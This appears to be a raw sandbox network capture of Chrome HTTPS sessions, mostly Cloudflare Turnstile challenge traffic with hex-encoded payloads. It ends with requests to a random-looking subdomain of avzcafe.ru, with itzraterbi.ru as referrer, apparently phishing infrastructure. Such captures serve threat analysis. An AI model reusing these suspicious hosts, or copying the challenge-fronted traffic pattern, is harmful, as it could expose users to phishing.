                                                                                                                          2024-12-19 16:09:21 UTC1369INData Raw: 6e 74 37 61 71 65 7a 65 33 37 50 4a 71 39 36 7a 75 50 62 6e 75 4e 47 33 33 37 72 57 7a 4c 6d 39 74 76 4c 38 77 41 51 44 38 73 57 2b 32 50 66 4a 78 75 7a 2b 7a 64 51 4c 39 39 4c 74 31 77 50 56 43 42 73 4e 33 2f 58 66 44 64 7a 6b 48 78 7a 67 36 43 4d 5a 35 52 67 6a 35 65 6b 73 4a 78 37 75 43 6a 63 74 38 4f 6f 6e 4a 2f 58 79 47 53 76 38 46 67 41 78 2f 54 45 52 4d 77 49 65 41 44 67 4d 49 67 67 37 43 51 4d 2f 4e 41 35 42 49 55 30 54 4c 79 55 53 46 6b 67 59 53 52 6b 68 56 30 73 65 4f 6c 74 49 49 68 39 46 56 69 55 74 4a 46 63 72 52 6d 74 63 4d 55 6f 73 57 44 68 4f 4e 47 4d 33 55 30 6c 71 4f 55 46 41 65 54 39 61 68 7a 35 43 58 31 57 41 52 6d 4b 4c 63 45 70 44 66 34 46 51 53 33 47 44 55 59 53 58 68 56 61 59 57 49 70 61 64 71 4e 61 58 6e 70 67 6c 57 4b 6b 61 49 78
                                                                                                                          Data Ascii: nt7aqeze37PJq96zuPbnuNG337rWzLm9tvL8wAQD8sW+2PfJxuz+zdQL99Lt1wPVCBsN3/XfDdzkHxzg6CMZ5Rgj5eksJx7uCjct8OonJ/XyGSv8FgAx/TERMwIeADgMIgg7CQM/NA5BIU0TLyUSFkgYSRkhV0seOltIIh9FViUtJFcrRmtcMUosWDhONGM3U0lqOUFAeT9ahz5CX1WARmKLcEpDf4FQS3GDUYSXhVaYWIpadqNaXnpglWKkaIx
                                                                                                                          2024-12-19 16:09:21 UTC1369INData Raw: 4d 44 4b 36 39 4f 33 72 74 48 51 78 4e 54 7a 79 62 2b 32 32 64 62 4d 33 50 76 52 78 37 37 68 35 4d 59 4c 41 38 58 62 44 65 58 39 78 64 33 6f 7a 64 45 57 42 4f 54 71 43 67 7a 34 33 2f 58 58 44 75 4d 6a 39 52 4c 5a 38 66 7a 68 35 53 6a 72 36 4f 2f 34 2f 43 51 44 4d 69 51 52 39 77 45 76 4d 77 6b 37 44 68 2f 38 4c 7a 51 4e 45 66 59 38 4a 77 6a 2b 49 69 55 48 54 43 55 47 48 41 4d 6d 4c 78 51 65 4d 55 67 6c 52 6a 49 34 46 31 77 63 47 69 31 65 4f 6a 77 6b 47 7a 35 46 49 32 68 58 49 6a 6b 66 51 6b 38 77 4f 6d 4e 6b 50 6d 4a 4f 53 44 4e 34 4f 44 5a 49 61 6c 5a 48 51 49 46 57 57 45 31 78 54 6c 4a 44 69 45 68 47 56 6e 70 6d 5a 46 6c 39 57 6c 35 55 53 32 35 73 59 59 52 5a 5a 6c 65 63 58 46 70 75 65 48 70 34 62 5a 42 6c 63 6d 68 66 67 6f 42 31 6d 47 6c 36 61 37 42 77
                                                                                                                          Data Ascii: MDK69O3rtHQxNTzyb+22dbM3PvRx77h5MYLA8XbDeX9xd3ozdEWBOTqCgz43/XXDuMj9RLZ8fzh5Sjr6O/4/CQDMiQR9wEvMwk7Dh/8LzQNEfY8Jwj+IiUHTCUGHAMmLxQeMUglRjI4F1wcGi1eOjwkGz5FI2hXIjkfQk8wOmNkPmJOSDN4ODZIalZHQIFWWE1xTlJDiEhGVnpmZFl9Wl5US25sYYRZZlecXFpueHp4bZBlcmhfgoB1mGl6a7Bw


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          61192.168.2.1649805104.18.95.414437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:22 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2106713247:1734621222:Ju1S4rINYs2w6jhaMJAc6wI0nSHHPD5uYn3o5b92WHs/8f48a7cc7ace41d9/.H3W3k_QuubbPTTWkYw5VKDIKNmMDBqT.SjUBhnSxnM-1734624549-1.1.1.1-Nr6MbTJA2B5hNY5I5gYF2L0m47RDXC_3R6cVJGZX96s5UAuGLPsnAnpIY.IFyYCK HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:22 UTC379INHTTP/1.1 404 Not Found
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:22 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 7
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          cf-chl-out: rapf1B4mYQ9vXkQlkLoWNRbur6mWDD1AQiQ=$7cyPYaNSUb4f0wws
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8f48a81d4bee4368-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-12-19 16:09:22 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                          Data Ascii: invalid


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          62192.168.2.1649806104.18.95.414437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:25 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2106713247:1734621222:Ju1S4rINYs2w6jhaMJAc6wI0nSHHPD5uYn3o5b92WHs/8f48a7cc7ace41d9/.H3W3k_QuubbPTTWkYw5VKDIKNmMDBqT.SjUBhnSxnM-1734624549-1.1.1.1-Nr6MbTJA2B5hNY5I5gYF2L0m47RDXC_3R6cVJGZX96s5UAuGLPsnAnpIY.IFyYCK HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 33611
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                          CF-Chl-RetryAttempt: 0
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          CF-Challenge: .H3W3k_QuubbPTTWkYw5VKDIKNmMDBqT.SjUBhnSxnM-1734624549-1.1.1.1-Nr6MbTJA2B5hNY5I5gYF2L0m47RDXC_3R6cVJGZX96s5UAuGLPsnAnpIY.IFyYCK
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5cyl9/0x4AAAAAAA1mMrsCS61Fknnw/auto/fbE/normal/auto/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:25 UTC16384OUTData Raw: 76 5f 38 66 34 38 61 37 63 63 37 61 63 65 34 31 64 39 3d 52 73 6e 50 43 7a 54 5a 75 25 32 62 73 54 75 56 5a 54 42 65 67 65 6c 56 71 54 41 52 54 38 65 62 6d 50 6b 45 7a 33 65 6e 6d 50 65 73 46 4b 65 67 65 74 6e 46 2b 65 63 76 4c 65 46 44 50 54 69 65 38 50 6b 6e 6e 6e 49 71 65 71 58 65 79 50 2b 5a 6b 6e 65 2b 6e 65 55 65 7a 75 54 46 65 56 31 56 74 63 4b 65 54 49 65 42 50 56 49 65 55 56 46 65 65 42 65 31 69 5a 34 4f 65 65 75 43 30 48 65 74 69 5a 68 6b 50 51 4a 62 37 2b 30 7a 65 65 74 48 65 52 75 50 33 2b 6e 65 59 47 44 65 4a 50 65 42 63 50 7a 42 6e 6a 56 4c 65 71 73 65 37 43 56 69 48 67 78 61 6a 44 65 6a 6f 43 78 48 49 4e 78 6a 71 75 69 31 65 51 6f 75 33 78 46 6a 6d 71 6c 48 6f 64 7a 32 65 2b 24 52 71 4b 31 56 64 7a 62 6d 6d 44 7a 30 52 62 39 4c 51 5a 70 47
                                                                                                                          Data Ascii: v_8f48a7cc7ace41d9=RsnPCzTZu%2bsTuVZTBegelVqTART8ebmPkEz3enmPesFKegetnF+ecvLeFDPTie8PknnnIqeqXeyP+Zkne+neUezuTFeV1VtcKeTIeBPVIeUVFeeBe1iZ4OeeuC0HetiZhkPQJb7+0zeetHeRuP3+neYGDeJPeBcPzBnjVLeqse7CViHgxajDejoCxHINxjqui1eQou3xFjmqlHodz2e+$RqK1VdzbmmDz0Rb9LQZpG
                                                                                                                          2024-12-19 16:09:25 UTC16384OUTData Raw: 53 70 57 58 59 54 44 54 6f 65 4c 65 39 65 56 73 2b 45 46 67 65 48 65 61 65 51 44 39 50 65 4b 65 31 65 7a 6f 46 63 65 4e 50 6b 61 61 55 4c 53 65 6e 6e 7a 6f 65 73 50 4a 47 46 69 65 69 50 2b 75 65 30 65 64 65 52 75 46 37 65 55 75 65 6f 7a 42 65 52 50 78 6f 7a 6b 65 72 50 2b 73 65 4e 65 41 53 43 65 71 50 65 6c 53 6d 57 73 57 34 69 65 6b 50 7a 6f 65 6b 65 6e 45 65 2b 65 61 65 51 5a 54 45 65 39 65 7a 6f 65 4c 65 5a 65 56 34 46 74 65 38 50 4a 24 6a 44 54 44 50 33 6e 54 2b 6e 5a 65 30 75 7a 62 50 6e 65 31 75 7a 37 65 2d 50 56 65 54 75 54 38 58 54 50 78 4d 50 55 50 7a 65 65 54 45 55 44 7a 71 54 58 65 34 73 7a 65 46 75 48 6f 36 46 65 46 34 65 6f 65 2b 4c 7a 69 54 74 7a 65 75 56 33 54 5a 50 30 75 71 32 34 75 71 54 75 78 77 54 4c 50 5a 75 78 69 54 4c 50 59 6e 65 37
                                                                                                                          Data Ascii: SpWXYTDToeLe9eVs+EFgeHeaeQD9PeKe1ezoFceNPkaaULSennzoesPJGFieiP+ue0edeRuF7eUueozBeRPxozkerP+seNeASCeqPelSmWsW4iekPzoekenEe+eaeQZTEe9ezoeLeZeV4Fte8PJ$jDTDP3nT+nZe0uzbPne1uz7e-PVeTuT8XTPxMPUPzeeTEUDzqTXe4szeFuHo6FeF4eoe+LziTtzeuV3TZP0uq24uqTuxwTLPZuxiTLPYne7
                                                                                                                          2024-12-19 16:09:25 UTC843OUTData Raw: 72 52 69 61 78 51 54 67 65 5a 2b 56 6a 2d 6e 71 55 33 2b 38 2d 39 51 47 72 37 58 34 58 76 36 5a 67 54 65 37 56 31 4e 57 77 34 2d 49 56 5a 54 6e 65 71 50 7a 42 78 63 36 79 6f 5a 55 7a 73 6e 34 6e 54 57 7a 6a 45 51 4b 57 53 4b 52 38 49 75 24 2d 38 4a 54 33 45 4e 71 54 6c 54 55 77 54 36 56 67 54 6b 45 62 36 71 78 54 38 45 6a 5a 56 64 54 43 5a 39 5a 71 54 6f 47 45 55 72 50 51 54 41 52 54 46 50 74 38 6f 59 69 2b 2b 38 41 77 45 4e 36 2b 31 6e 42 45 57 71 75 71 44 48 75 52 53 37 30 50 6f 52 24 71 65 6c 48 33 6b 72 79 35 48 4b 4d 58 2b 48 78 56 6e 51 30 30 4d 68 57 6d 33 65 46 63 35 37 65 38 65 71 5a 7a 69 50 63 36 4e 65 52 71 65 79 54 37 4a 33 4a 45 45 34 45 68 78 56 4d 73 34 37 68 37 55 4d 42 50 51 50 65 75 65 31 50 6b 77 39 54 24 33 71 73 4d 63 6e 65 36 34 77
                                                                                                                          Data Ascii: rRiaxQTgeZ+Vj-nqU3+8-9QGr7X4Xv6ZgTe7V1NWw4-IVZTneqPzBxc6yoZUzsn4nTWzjEQKWSKR8Iu$-8JT3ENqTlTUwT6VgTkEb6qxT8EjZVdTCZ9ZqToGEUrPQTARTFPt8oYi++8AwEN6+1nBEWquqDHuRS70PoR$qelH3kry5HKMX+HxVnQ00MhWm3eFc57e8eqZziPc6NeRqeyT7J3JEE4EhxVMs47h7UMBPQPeue1Pkw9T$3qsMcne64w
                                                                                                                          2024-12-19 16:09:26 UTC1312INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:26 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4472
                                                                                                                          Connection: close
                                                                                                                          cf-chl-out-s: /AxT/2SaxLpUpjVaa5tOgdM+IKAHQ/+y9y2uqYQh3/mWF8X5c2abB5Kerf/1CmVXjg3cUo9O4MEDnckJeZAyPgQKVNfinONvUfRDDsnSIqGw7MPbvsnayi4dGlwoST/SCwNq4ZNYO3TTHKTdNb2X6HHlxcBg6UT8IqbomQkZtyEQ6bWjqcOR49ll+hJy46WmkZkKEmyDS0l44/Zg4eUOvvUMNyNReLj3RDLV+rjkFApr15bEVuQz3QGTIzn65PCiOf/CiFI8kGXmeZ3SP7RC1fOM/dGJvIICSm7tqVgMByzW924yTQwArbCAdsYIsEDt8eaTgF2ODTX+9UBDHSxmN6zuBJ6/yOGD0S6kAup+6ZUkRjlKmLEA6VVosoFTq/6FWochN6hu30MaJSTzsAGgrhge2bZKi7/QcIza/EbsWqSND6+GAatWzrAxCMnVuxiUt8BAnvKySMFpvP1KicufZ2jitBKMr2EOcZ7uICgbnlr2PyKq+jcELnlBVJEn2Iwe7W+6evmA6QgjMKmCNXbusIvcU9enKKLD3LiMVV0x+64VEGmKCtCbvWmrHX+C/u08TNvfW8TYFOLXQzvWTTbzuJ+ZlKq4ifqacs3kE5gtKAilsGilMwsO1Ty8vjvlH8k1XmPwldA/ePG2EyxKhPU+/PObYckW2A3WjMKreljKxwYzDUIxuisnndQ0O7EzwMHgFwkfvnvQHCpZld0a8m52vySISfCrKXDVgGYR609gopuo5RPOgJxR2jPk2nHYpkGyFMPatKGCFJSihkWboHbyUSX3enZictn24oEteMIWgs2a9MFffnhrXjTGyhVH5mXz+NON9dOwdVa5D354NqbafYVcesMeGTG3Oid7nGvMxlczsbwKnwO9dSCZ4+VOYDEQS38ng7blIVaZ++cV8MWRtsfPItsU7w8dY+e2VHH6xe9NcmEj8QqEMgj8AlonJmh2x732+obQbebjvIO4cmyTjj8RJU/cYwzZmOMiO52Dp9XAMHnhZY [TRUNCATED]
                                                                                                                          2024-12-19 16:09:26 UTC233INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 4d 44 33 61 57 4f 33 38 79 33 75 62 4b 48 62 4e 32 48 31 42 6b 63 42 6a 47 55 55 48 76 57 6c 36 67 72 6b 63 52 4b 58 76 2f 37 77 53 45 38 57 6c 2b 4b 50 46 32 35 75 43 50 4f 6c 4a 6a 50 43 34 41 6e 66 67 62 50 79 31 4b 54 59 53 4b 46 71 30 6b 30 42 7a 76 41 77 64 4d 4a 62 2f 2f 37 65 33 67 66 4c 6c 54 4d 63 53 43 59 30 6e 46 6f 79 34 57 54 73 68 48 4e 77 3d 24 78 5a 38 55 49 55 73 38 59 31 63 74 72 59 48 66 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 34 38 61 38 33 30 34 39 34 37 31 38 63 34 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: cf-chl-out: MD3aWO38y3ubKHbN2H1BkcBjGUUHvWl6grkcRKXv/7wSE8Wl+KPF25uCPOlJjPC4AnfgbPy1KTYSKFq0k0BzvAwdMJb//7e3gfLlTMcSCY0nFoy4WTshHNw=$xZ8UIUs8Y1ctrYHfServer: cloudflareCF-RAY: 8f48a830494718c4-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                          2024-12-19 16:09:26 UTC1193INData Raw: 72 36 71 61 6e 59 75 71 6f 4b 79 35 76 62 61 79 77 36 65 54 6e 73 57 32 72 71 4b 47 6d 63 53 62 6e 61 32 4d 70 71 48 46 74 63 4f 36 71 39 6e 52 79 70 79 30 74 63 4f 66 34 5a 32 78 74 4c 4c 6b 74 62 69 32 70 38 54 4a 79 71 72 44 7a 75 76 32 30 38 7a 4d 74 63 6a 71 76 63 76 49 32 64 62 66 30 77 54 67 78 67 50 6c 2f 65 62 4a 76 2b 45 45 79 75 66 65 42 66 58 51 34 4f 62 6d 47 77 55 48 36 2b 63 5a 47 2b 41 63 48 64 33 35 39 67 48 31 48 42 4d 49 36 42 6f 6b 46 2f 63 6b 4b 51 2f 7a 4b 77 4c 79 43 76 59 51 47 6a 50 37 45 69 77 74 2f 53 34 34 4c 66 34 78 42 6a 37 36 45 69 6f 43 53 53 41 74 43 30 6f 36 50 78 49 6d 52 7a 59 57 49 6c 56 4a 55 53 30 77 4c 54 5a 52 53 6a 6b 34 50 7a 67 77 56 30 59 33 56 69 63 73 4f 7a 39 4c 54 57 45 73 58 55 31 65 59 79 39 4e 65 6c 4e
                                                                                                                          Data Ascii: r6qanYuqoKy5vbayw6eTnsW2rqKGmcSbna2MpqHFtcO6q9nRypy0tcOf4Z2xtLLktbi2p8TJyqrDzuv208zMtcjqvcvI2dbf0wTgxgPl/ebJv+EEyufeBfXQ4ObmGwUH6+cZG+AcHd359gH1HBMI6BokF/ckKQ/zKwLyCvYQGjP7Eiwt/S44Lf4xBj76EioCSSAtC0o6PxImRzYWIlVJUS0wLTZRSjk4PzgwV0Y3VicsOz9LTWEsXU1eYy9NelN
                                                                                                                          2024-12-19 16:09:26 UTC1369INData Raw: 53 63 72 45 43 37 37 49 42 45 43 4d 79 6b 59 4f 55 41 6a 42 45 6b 72 4c 55 5a 42 48 69 73 4e 56 52 38 75 54 6b 6b 6f 4f 52 59 76 4e 31 74 55 4b 32 45 2f 57 43 4e 6a 55 44 78 49 4a 45 70 67 50 46 42 61 55 46 70 75 62 30 63 75 64 55 39 48 56 32 56 6d 64 6d 31 50 58 33 5a 6a 65 56 39 67 68 6b 46 77 56 45 46 4b 5a 47 6c 66 57 58 6d 45 68 57 6c 79 59 6d 2b 4e 67 58 64 75 55 58 70 57 61 32 6c 39 57 6e 53 66 67 5a 36 51 5a 49 53 45 6f 5a 75 45 6f 48 35 68 6a 4a 71 68 62 49 32 53 62 37 61 5a 6c 34 65 49 70 37 4b 74 65 5a 70 37 6d 4d 53 77 6b 70 65 53 6e 72 32 66 6d 36 65 70 6f 36 2b 36 72 61 43 4b 71 38 7a 49 6c 64 4f 32 7a 61 57 39 71 62 44 65 74 36 32 65 7a 38 57 64 78 4f 4f 2f 36 74 36 6a 78 63 79 37 75 63 62 6c 33 65 2f 4c 72 64 53 76 31 65 4c 61 75 2b 65 32
                                                                                                                          Data Ascii: ScrEC77IBECMykYOUAjBEkrLUZBHisNVR8uTkkoORYvN1tUK2E/WCNjUDxIJEpgPFBaUFpub0cudU9HV2Vmdm1PX3ZjeV9ghkFwVEFKZGlfWXmEhWlyYm+NgXduUXpWa2l9WnSfgZ6QZISEoZuEoH5hjJqhbI2Sb7aZl4eIp7KteZp7mMSwkpeSnr2fm6epo6+6raCKq8zIldO2zaW9qbDet62ez8WdxOO/6t6jxcy7ucbl3e/LrdSv1eLau+e2
                                                                                                                          2024-12-19 16:09:26 UTC1369INData Raw: 38 69 50 67 59 32 4f 30 42 4d 4b 79 6b 63 52 79 5a 4d 54 55 38 6c 4c 53 38 6f 4a 44 67 75 54 31 52 4a 48 31 46 59 4c 45 46 55 52 47 59 38 52 55 6c 6d 52 56 78 4f 56 6b 31 68 55 6d 4a 4b 5a 55 35 66 51 45 31 4d 65 30 78 39 55 48 73 33 57 45 74 54 55 7a 70 64 63 57 5a 2f 57 31 35 71 56 33 75 45 52 31 6c 2f 53 59 52 66 62 6d 5a 79 5a 48 46 71 6c 6d 69 51 58 47 79 57 56 32 79 57 58 47 2b 42 65 4a 4a 31 59 35 61 68 64 61 53 4e 66 6f 69 73 6b 6f 43 4d 64 59 2b 72 65 4a 71 6d 75 58 57 30 66 62 68 33 6b 48 72 46 72 35 71 53 67 4b 4b 6d 6e 38 79 6f 75 34 57 67 76 38 44 41 71 63 4c 4d 70 36 6d 6a 73 72 47 78 74 36 61 38 72 4b 6e 67 34 4f 58 6c 31 4d 53 33 36 4e 65 6e 77 64 75 36 71 4d 4c 79 75 74 47 38 76 2b 6a 56 71 76 6a 30 36 38 76 36 39 39 62 51 37 2f 6a 4f 75
                                                                                                                          Data Ascii: 8iPgY2O0BMKykcRyZMTU8lLS8oJDguT1RJH1FYLEFURGY8RUlmRVxOVk1hUmJKZU5fQE1Me0x9UHs3WEtTUzpdcWZ/W15qV3uER1l/SYRfbmZyZHFqlmiQXGyWV2yWXG+BeJJ1Y5ahdaSNfoiskoCMdY+reJqmuXW0fbh3kHrFr5qSgKKmn8you4Wgv8DAqcLMp6mjsrGxt6a8rKng4OXl1MS36Nenwdu6qMLyutG8v+jVqvj068v699bQ7/jOu
                                                                                                                          2024-12-19 16:09:26 UTC541INData Raw: 4e 4e 30 41 63 49 45 39 41 4a 43 5a 44 55 44 59 6c 4d 53 59 7a 4c 45 73 79 52 79 70 63 50 6a 64 6c 4a 46 67 68 61 54 49 6c 56 45 41 33 54 6d 67 2b 58 6d 68 47 52 57 56 42 53 30 46 43 56 6a 49 30 56 6a 31 49 4e 6e 46 34 54 6c 4b 45 65 31 35 5a 56 46 56 4a 57 59 31 69 62 57 42 5a 65 30 56 6c 6b 35 42 51 61 33 4e 71 55 33 46 31 6c 46 64 31 61 6d 31 56 63 36 4f 67 6e 48 6c 6f 70 49 70 39 72 4b 64 36 67 62 47 6b 67 47 61 31 6c 72 4b 4a 75 61 69 77 6a 4a 47 37 64 5a 57 4c 66 4a 75 57 74 61 61 78 65 73 65 2f 69 5a 2f 48 6f 70 66 52 6b 4d 65 71 6a 4e 4b 55 6b 39 6e 44 6b 4a 69 53 6e 61 6d 30 6b 74 79 74 6f 65 54 50 33 37 33 70 71 4f 65 70 37 4f 6a 58 77 66 43 78 76 64 48 30 38 37 36 2f 2b 62 69 34 73 62 4b 39 35 39 57 32 2b 38 44 56 42 75 38 45 32 37 34 46 31 65
                                                                                                                          Data Ascii: NN0AcIE9AJCZDUDYlMSYzLEsyRypcPjdlJFghaTIlVEA3Tmg+XmhGRWVBS0FCVjI0Vj1INnF4TlKEe15ZVFVJWY1ibWBZe0Vlk5BQa3NqU3F1lFd1am1Vc6OgnHlopIp9rKd6gbGkgGa1lrKJuaiwjJG7dZWLfJuWtaaxese/iZ/HopfRkMeqjNKUk9nDkJiSnam0ktytoeTP373pqOep7OjXwfCxvdH0876/+bi4sbK959W2+8DVBu8E274F1e


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          63192.168.2.1649807104.18.95.414437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:27 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2106713247:1734621222:Ju1S4rINYs2w6jhaMJAc6wI0nSHHPD5uYn3o5b92WHs/8f48a7cc7ace41d9/.H3W3k_QuubbPTTWkYw5VKDIKNmMDBqT.SjUBhnSxnM-1734624549-1.1.1.1-Nr6MbTJA2B5hNY5I5gYF2L0m47RDXC_3R6cVJGZX96s5UAuGLPsnAnpIY.IFyYCK HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:27 UTC379INHTTP/1.1 404 Not Found
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:27 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 7
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          cf-chl-out: fpy3W7T6d3nI/+cwUgAq9t1nxMpeoTNJJOM=$K9PMqH4igIYG/cAH
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8f48a83c9ac08ccd-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-12-19 16:09:27 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                          Data Ascii: invalid


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          64192.168.2.1649809172.67.130.584437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:29 UTC685OUTGET /450651641146885713188409uEDZBXeukDSKEJVJYYHNXWLRZMBRXSICETHCSJUGTTQLXNSIAORTBKCRSEOOR HTTP/1.1
                                                                                                                          Host: 9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://wv.itzraterbi.ru
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://wv.itzraterbi.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:30 UTC891INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:30 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6q1BHmm0neFGGpSg5XzluSs6NacPH0bdR85GNtDm5E7Q33v3wOSi1RjonIlUW0tmWFDufBkMd2bmpRraboa9kRhXxfqQGVJRjE5xRMCnDY1Sth6ecKCJI9zsF%2BJea1MfxB7OJqN2yrg3tESd4eJPhJSexgpi7%2BlnccmUy2z%2F6GDtOE0cRXGxIGDObKlulWA3jprU3016LZO9"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8f48a8479f6cef9d-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1794&rtt_var=683&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1263&delivery_rate=1590413&cwnd=121&unsent_bytes=0&cid=fda73b4fa95cce6b&ts=1126&x=0"
                                                                                                                          2024-12-19 16:09:30 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                          Data Ascii: 11
                                                                                                                          2024-12-19 16:09:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          65192.168.2.1649811172.67.130.584437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:33 UTC479OUTGET /450651641146885713188409uEDZBXeukDSKEJVJYYHNXWLRZMBRXSICETHCSJUGTTQLXNSIAORTBKCRSEOOR HTTP/1.1
                                                                                                                          Host: 9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:34 UTC893INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:33 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
